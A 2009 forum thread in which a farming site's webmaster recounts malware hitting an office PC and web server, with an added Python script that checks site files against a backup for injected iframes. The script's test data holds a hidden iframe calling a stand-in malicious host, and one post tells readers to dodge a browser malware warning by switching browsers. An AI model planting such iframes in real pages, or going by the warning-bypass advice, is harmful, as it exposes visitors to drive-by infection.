NEWS ITEM - SITES WERE DOWN DUE TO ATTACKS BY HACKERS

The latest news we have available together with any necessary links. If you have any questions, please use the forum or the contact emails addresses.

webmaster
Site Admin
Posts: 167
Joined: Mon Aug 22, 2005 6:11 pm
Location: Australia
Contact:

NEWS ITEM - SITES WERE DOWN DUE TO ATTACKS BY HACKERS

Post by webmaster » Mon Sep 21, 2009 8:43 am

Hello,

If you have been seeing a strange message when trying to access the forum, you do not need new glasses or a lecture in computer coding.. no, for us it was far worse than that!!

We have not had a good week!

Firstly our main hard drive went down and when we tried to do a back up to a new drive, it too fell over!! This was just the start. A couple of days later when we were just getting everything up again, we were struck by hackers who got into our server. They then changed many of our files and inserted a script which continued to do this no matter how many times we removed and reinstalled them.

Finally, after 1 full week, it looks like we may have got the last of them, although they are insidious little programs which hide under legitimate names and in dark corners of the registry, so they are hard to find and could come back any time.

It is up now, however if one day you see similar messages, just imagine us toiling hour after hour, pulling what hair we have left out, desperately trying to get everything up and running again.

These are our terrorists, and their bombs are their evil little programs which constantly roam the internet searching for anything vulnerable to attack.

Once again please enjoy the forum!! :-)

Lonnie
Webmaster
The Forum for Peter Andrew's Natural Sequence Farming


It has been an 8 day week - Beware of Virus and Malware

Post by webmaster » Sat Sep 26, 2009 10:50 am

Well it has sure been 8 days this week! The Beatles or rather John got it right and I remember singing my heart out to it, night after night!!

This is the story...

Out of the blue it happened and even though we had all the firewalls on, pop up blockers and virus programs on our computers, these got in!!

This particular insidious piece of code has several names such as Packed Revolt, Trojan Horse etc, but it is an 'iframe' which is placed in the code behind what you see on the page.

This code is linked to a site with a .ru (Russian registry) and it then tries to jump from that page to every computer which opens it. It is pure Malware or a Virus!

A client suggested we look at a site as he wanted one just like it. We did, and immediately we clicked on it, we got many screens overlaying each other at a very fast rate and then the screen locked!!

I knew straight away we had been violated, however it was now a matter of getting it off the computer it was on before it spread right through our network and to every site we had.

We rebooted the computer, however a screen saver came up saying we had been violated and listed 20 or so viruses which were now on our system. It offered help by suggesting we buy their software called Total Security for $79US and it would clean us up.

I was still able to use the computer programs however I knew once I looked at another page on the Internet, I would infect them.

Using another computer in the office, I did searches on Google and Yahoo to find out more about this Total Security thing and found it was a scam and whilst they did infect you, if you bought their program, it would not be delivered as it did not exist and now they had your payment details as well!

I downloaded some more free programs which they suggested we use to see exactly what was on the computer and together with the ones we already use, spent 2 days just scanning and rescanning all the drives, especially the C Drive where the Windows and Documents and Setting directories are.

At first we came up with several viruses in the directories but more importantly, in the registry hiding amongst all the code. They do this so when you think you have all the files off and you reboot, they are rebuilt again from the registry, so you're virtually back where you started!

They also lodge in the areas of your drives which are set aside for when your system does an auto backup for later restoring purposes and in the areas set aside for the recycle bin. So you see they are very insidious.

I removed most of them by the second day (15 hours) and after several reboots, 3 programs showed the computer was clean.

So you think it was over... But a big 'NO' to that theory!

To set the scene..

This particular computer is the main computer used to access the admin areas of all the many web sites we host for our business clients as well as our own.

We go to our server where the web sites are using a method called 'FTP' which is the main method for uploading and downloading files to the websites. Everyone has a special user name and password, and it is rather like having a special key to your back door which only your closest friends can use on this 'back door'.

As we were way behind on our web site and hosting work we just had to bite the bullet and start doing our 'administration' business. After all as we had a clean computer, we braved it and connected to our server.

Everything went fine until we started to download some files and the warning bells rang telling us it was a virus. Yes that same virus!

To cut the story short as it goes for another 6 days..

The virus had got into our server through someone else's FTP connection and infected many of our own and client's files. This caused them to crash so anyone looking for the page just saw a coded message.

We spent those 6 days changing everyone's passwords a few times and spending hours everyday re-installing the files that had been corrupted, so the site could be online.

Even though we had the sites up, the next morning around 6am it was programmed to once again automatically change those clean files back to corrupted ones, so once again we had to spend the day re-installing from our clean back up.

Over those days, eventually one by one our sites became clean from infection and have stayed up and online.

This morning the last 2 of them showed they were not infected and were still online.

So, it looks like we are now all okay.

What is the lesson here?

In our case, we were just looking at a normal business site which itself had been infected and we got it from them. How it got onto the computer through all our protection, we can only guess it was a 'new' variety which our virus and malware programs had not yet included in their 'definitions'.

A client had also got it from another source and after uploading his files, our server got it!!

The only thing one can do is the following..

1. Always, always, always have a backup of your files, especially the ones which are important to you. In fact it will also save you a lot of time and frustration and money if you have an 'image' or 'clone' copy of your complete C Drive. If it falls over for any reason, you just re-install the image or clone and you have all your programs and files from that drive up and running again.

We use a program called 'Acronis True Image'. (About $70 US) It will do both methods of backup 'images' (take up less space) and clone (needs another full drive).

A backup should be made to an external hard drive and today they are as cheap as chips.. They come in a case and just need to be plugged into your USB port. Get at least a 500 gig which will be able to take your whole C drive and others if you want to back them up.

http://www.acronis.com.au/homecomputing/

2. Always have at least 2 Malware and Virus programs running, especially for email and web browsers.

We use the very good AVG 8.5 Anti Virus and Anti Spyware program. It picked up 99.99% of our viruses.
http://free.avg.com/

We also use this very good program which is mainly a Malware program but very good and FREE!
http://www.malwarebytes.org/mbam.php

We also have Ad-Aware for scam advertising viruses.
http://www.lavasoft.com/products/ad_aware_free.php

You MUST keep up to date with these FREE programs as ONLY the latest versions get the latest viruses!!

Make sure EVERY DAY, if you use your computer a lot on the Internet, you at least do a scan of your main C Drive by running these programs. They can run at night whilst you sleep at least once a week.
Do NOT run them at the same time.

That's it!

If you haven't scanned your box for a while, do it now and think of what programs and files you have there which would have you devastated if you lost them.

Google and other sources say over the last month (Aug/Sept 2009) the amount of people reporting these problems has multiplied by 10 and is going up.

Good Luck!!!


Lonnie
Webmaster
The Forum for Peter Andrew's Natural Sequence Farming
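The post above describes an injected hidden 'iframe' pointing at an off-site host, and files that were quietly re-corrupted each morning until restored from a clean backup. The script below is an added example (not code from this forum or its webmaster) of the check a site administrator can run after such an incident: compare the deployed files against the clean backup by hash, and flag any iframe whose host is not one of the site's own. The hostnames and page contents are constructed placeholders.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample data: a clean page from backup and the same page as
# deployed, with a hidden off-site iframe of the kind the post describes.
# The real injected domain is not given in the post; "evil.invalid" is a placeholder.
CLEAN_PAGE = "<html><body><h1>Natural Sequence Farming</h1></body></html>"
INFECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://evil.invalid/in.cgi?3" width=1 height=1 '
    'style="visibility:hidden"></iframe></body>')
OWN_HOSTS = {"www.example-forum.invalid"}  # placeholder for the site's own hostnames

# Matches the src attribute of any <iframe ...> tag, quoted or not.
IFRAME_SRC = re.compile(r"<iframe\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def off_site_iframes(html, own_hosts):
    """Return iframe src URLs whose host is not one of the site's own hosts.
    Relative srcs (no host) are treated as the site's own."""
    hits = []
    for src in IFRAME_SRC.findall(html):
        host = urlparse(src).hostname
        if host and host.lower() not in own_hosts:
            hits.append(src)
    return hits


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def check_site(clean_tree, deployed_tree, own_hosts):
    """clean_tree and deployed_tree map path -> file text (read from the
    backup and from the web root). Returns findings per path: files whose
    hash differs from the backup, files missing from the web root, files
    that exist only in the web root, and any off-site iframes found."""
    findings = {}
    for path, clean_text in clean_tree.items():
        deployed = deployed_tree.get(path)
        if deployed is None:
            findings[path] = {"status": "missing", "iframes": []}
            continue
        modified = sha256(deployed) != sha256(clean_text)
        frames = off_site_iframes(deployed, own_hosts)
        if modified or frames:
            findings[path] = {"status": "modified" if modified else "clean", "iframes": frames}
    for path in deployed_tree.keys() - clean_tree.keys():  # dropped-in files (e.g. new scripts)
        findings[path] = {"status": "unexpected",
                          "iframes": off_site_iframes(deployed_tree[path], own_hosts)}
    return findings
```

Any file reported as "modified" with an off-site iframe, or as "unexpected", is the one to restore from the clean backup; a report that keeps reappearing at the same time each day points to something on the server re-writing the files, not to a fresh upload.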


Post by webmaster » Sat Sep 26, 2009 5:08 pm

Hi,

An addendum to the above post..

Google, who have a reporting system run by robots who scan the internet endlessly, found the NSfarming site to have something suspicious on it.

When they find this result, as they currently have over 2 million sites, they install a Warning panel which comes up if you are a user of Google and using Firefox.

If you are not using Firefox or are not a user of Google then you do not see the panel.

This could be seen as a good service especially if it is instant, however that is not the case. After it is reported it takes a while for them to send an email to the site owner or administrator notifying them of the potential problem.

To get the panel off, one has to clean the site if it is indeed infected, then jump through hoops on a Google site to request them to review it and take the panel down.

Problem is, they say on their site that it could take 90 days to do this.

So, in our case even though we cleaned the site as soon as we were told, we have to wait until they get around to removing the panel.

So... if you're getting a Warning panel using Firefox, close it down and use Internet Explorer instead this time. You'll then see all you want to see!

... and on and on we go...

Lonnie
The Forum for Peter Andrew's Natural Sequence Farming


Post by webmaster » Fri Oct 02, 2009 9:12 am

The site has been clear of infections for a week now and was released from the Google/FireFox Warning panel..

Google Diagnostic

We did notice this morning this forum was attacked again, however we caught it in time.

It now seems evident someone, for whatever reason, is trying to sabotage the forum. Hopefully it is nothing to do with what we are all about, and just some crazy hacker out there flexing his/her script writing muscles.

We are increasing security even further in the hope this will suffice.

Lonnie
Webmaster
The Forum for Peter Andrew's Natural Sequence Farming


Update Oct 2 11.50am

Post by webmaster » Fri Oct 02, 2009 11:51 am

Well after further diagnosis, and hour after hour of this timewasting, we have found the culprits in the Eastern Europe block, however using many addresses.

Slovenia, Hungary, Poland, Romania, Sweden, Netherlands are just some of them, all accessing within seconds of each other.

It continues..

LL
The Forum for Peter Andrew's Natural Sequence Farming
